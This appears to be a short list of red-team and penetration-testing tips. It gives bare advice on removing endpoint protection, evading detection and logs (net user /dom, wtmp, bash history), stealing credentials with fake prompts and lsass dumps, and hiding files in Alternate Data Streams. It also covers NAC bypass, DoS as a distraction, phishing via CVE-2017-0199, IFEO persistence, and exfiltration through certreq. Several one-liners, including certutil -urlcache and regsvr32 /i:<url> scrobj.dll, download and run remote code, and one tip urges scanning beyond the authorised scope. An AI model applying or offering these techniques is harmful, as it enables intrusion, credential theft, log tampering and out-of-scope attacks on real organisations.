I am collecting/writing redteam and pentest tips.
Use cleanwipe for uninstalling Sep. It doesn't require Administrator privileges.
Scan all local network IP ranges(192.168.0.0/16,172.16.0.0/12,10.0.0.0/8) instead of the scope given. You can find the forgotten networks or hosts.
Use net user /dom instead of net user /domain. Second one may be being watch by endpoint solution.
Use wmiexec instead of psexec. It makes less noise.
If you need put a file on disk, use Alternate Data Streams.
If you have low priv shell, use fake login prompt for credentials.
If you need plaintext credentials and you don't want to use mimikatz. Dump lsass and parse it in local.
Avoid wtmp logging with ssh -l username target -T.
Use kill -9 $$ for avoiding bash history on exit.
If you have a connection but NAC is blocking you. Listen to broadcasts and collect mac address. And use printer's macs for NAC bypass.
Scan external network with Nessus, Netsparker etc. or make little DoS/DDoS attacks to hide real action from blue team.
Use ROPEMAKER method and CVE-2017-0199 for creating phishing mails. https://www.mimecast.com/globalassets/documents/whitepapers/wp_the_ropemaker_email_exploit.pdf
You can download any files with signed certutil.exe like this: certutil -urlcache -split -f <url> <out_filename
You can run your dlls like this: regsrv32 /s /u dll_name
You can run scripts remotely with regsvr32.exe like this: regsvr32 /s /n /u /i:<url> scrobj.dll
Use smtp relay for internal phishing.
You can encrypt your payloads/macros with using target company domain name as key.
You can use HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ with Debugger value for persistence.
You must tune connection limit when using automatic vulnerability scanners for avoiding network dropouts.
You can use Windows's certreq.exe for data exfiltration.